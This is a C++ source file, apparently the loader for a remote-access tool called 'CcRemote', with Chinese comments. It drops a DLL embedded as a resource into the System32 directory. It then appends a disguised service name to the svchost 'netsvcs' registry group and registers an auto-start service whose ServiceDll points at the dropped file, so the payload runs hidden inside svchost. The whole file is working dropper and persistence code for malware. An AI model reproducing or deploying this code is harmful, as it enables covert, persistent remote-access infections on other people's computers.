// Loder.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include #include #include "resource.h" #include "RegEditEx.h" bool CreateMyFile(const char* strFilePath, LPBYTE lpBuffer, DWORD dwSize) { DWORD dwWritten; HANDLE hFile = CreateFile(strFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if (hFile != NULL) { WriteFile(hFile, (LPCVOID)lpBuffer, dwSize, &dwWritten, NULL); } else { return false; } CloseHandle(hFile); return true; } //要释放的路径 资源ID 资源名 bool CreateEXE(const char* strFilePath, int nResourceID, const char* strResourceName) { HRSRC hResInfo; HGLOBAL hResData; DWORD dwSize; LPBYTE p; // 查找所需的资源 hResInfo = FindResource(NULL, MAKEINTRESOURCE(nResourceID), strResourceName); if (hResInfo == NULL) { //MessageBox(NULL, "查找资源失败!", "错误", MB_OK | MB_ICONINFORMATION); return false; } // 获得资源尺寸 dwSize = SizeofResource(NULL, hResInfo); // 装载资源 hResData = LoadResource(NULL, hResInfo); if (hResData == NULL) { //MessageBox(NULL, "装载资源失败!", "错误", MB_OK | MB_ICONINFORMATION); return false; } // 为数据分配空间 p = (LPBYTE)GlobalAlloc(GPTR, dwSize); if (p == NULL) { //MessageBox(NULL, "分配内存失败!", "错误", MB_OK | MB_ICONINFORMATION); return false; } // 复制资源数据 CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize); bool bRet = CreateMyFile(strFilePath, p, dwSize); if (!bRet) { GlobalFree((HGLOBAL)p); return false; } GlobalFree((HGLOBAL)p); return true; } char *AddsvchostService() { char *lpServiceName = NULL; int rc = 0; HKEY hkRoot; char buff[2048]; //打开装所有svchost服务名的注册表键 //query svchost setting char *ptr; char pSvchost[] = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost"; rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_ALL_ACCESS, &hkRoot); if (ERROR_SUCCESS != rc) return NULL; DWORD type, size = sizeof buff; //枚举他所有的服务名 rc = RegQueryValueEx(hkRoot, "netsvcs", 0, &type, (unsigned char*)buff, &size); SetLastError(rc); if (ERROR_SUCCESS != rc) RegCloseKey(hkRoot); int i = 0; bool bExist = false; char servicename[50]; do { //这里获得类似这样的服务名netsvcs_0,netsvcs_1。。。。。。。 wsprintf(servicename, "netsvcs_0x%d", i); for (ptr = buff; *ptr; ptr = strchr(ptr, 0) + 1) { //然后比对一下服务名中是否有这个名字了 if (lstrcmpi(ptr, servicename) == 0) { bExist = true; break; //如果没有就跳出 } } if (bExist == false) break; bExist = false; i++; } while (1); servicename[lstrlen(servicename) + 1] = '\0'; //然后将这个服务名写到所有服务名的后面, //不要妄想,直接用api在一个注册表的键值后面添加一些信息 memcpy(buff + size - 1, servicename, lstrlen(servicename) + 2); //然后将含有新服务名的缓冲区写入注册表,注册表里原有内容被覆盖 rc = RegSetValueEx(hkRoot, "netsvcs", 0, REG_MULTI_SZ, (unsigned char*)buff, size + lstrlen(servicename) + 1); RegCloseKey(hkRoot); SetLastError(rc); if (bExist == false) { lpServiceName = new char[lstrlen(servicename) + 1]; lstrcpy(lpServiceName, servicename); } //回到 InstallService return lpServiceName; } void StartService(LPCTSTR lpService) { SC_HANDLE hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); if (NULL != hSCManager) { SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START); if (NULL != hService) { StartService(hService, 0, NULL); CloseServiceHandle(hService); printf("lpService"); } CloseServiceHandle(hSCManager); } } int main() { //CreateEXE("E:\\aaa.dll", IDR_DLL1, "DLL"); char lpServiceDescription[]= "CcRemote服务"; char strModulePath[MAX_PATH]; char strSysDir[MAX_PATH]; char strSubKey[1024]; DWORD dwStartType = 0; char strRegKey[1024]; int rc = 0; HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0; SC_HANDLE hscm = NULL, schService = NULL; //打开服务 hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); GetSystemDirectory(strSysDir, sizeof(strSysDir)); char bin[] = "%SystemRoot%\\System32\\svchost.exe -k netsvcs"; char *lpServiceName = AddsvchostService(); //*添加的代码在这个函数中* char lpServiceDisplayName[128] = {0}; wsprintf(lpServiceDisplayName, "%s_ms,", lpServiceName); //这里返回新的服务名后就构造服务dll的名字 memset(strModulePath, 0, sizeof(strModulePath)); wsprintf(strModulePath, "%s\\%sex.dll", strSysDir, lpServiceName); //然后构造服务中的描述信息的位置 wsprintf(strRegKey, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName); schService = CreateService( hscm, // SCManager database lpServiceName, // name of service lpServiceDisplayName, // service name to display SERVICE_ALL_ACCESS, // desired access SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, // start type SERVICE_ERROR_NORMAL, // error control type bin, // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL); // no password dwStartType = SERVICE_WIN32_OWN_PROCESS; if (schService == NULL) { throw "CreateService(Parameters)"; printf("schServicenull"); } CloseServiceHandle(schService); CloseServiceHandle(hscm); hkRoot = HKEY_LOCAL_MACHINE; //这里构造服务的描述键 wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName); if (dwStartType == SERVICE_WIN32_SHARE_PROCESS) { DWORD dwServiceType = 0x120; //写入服务的描述 WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Type", REG_DWORD, (char *)&dwServiceType, sizeof(DWORD), 0); } //写入服务的描述 WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Description", REG_SZ, (char *)lpServiceDescription, lstrlen(lpServiceDescription), 0); lstrcat(strSubKey, "\\Parameters"); //写入服务的描述 WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "ServiceDll", REG_EXPAND_SZ, (char *)strModulePath, lstrlen(strModulePath), 0); printf("123"); if (schService != NULL) { CreateEXE(strModulePath, IDR_DLL1, "DLL"); StartService(lpServiceName); } RegCloseKey(hkRoot); RegCloseKey(hkParam); CloseServiceHandle(schService); CloseServiceHandle(hscm); system("pause"); return 0; }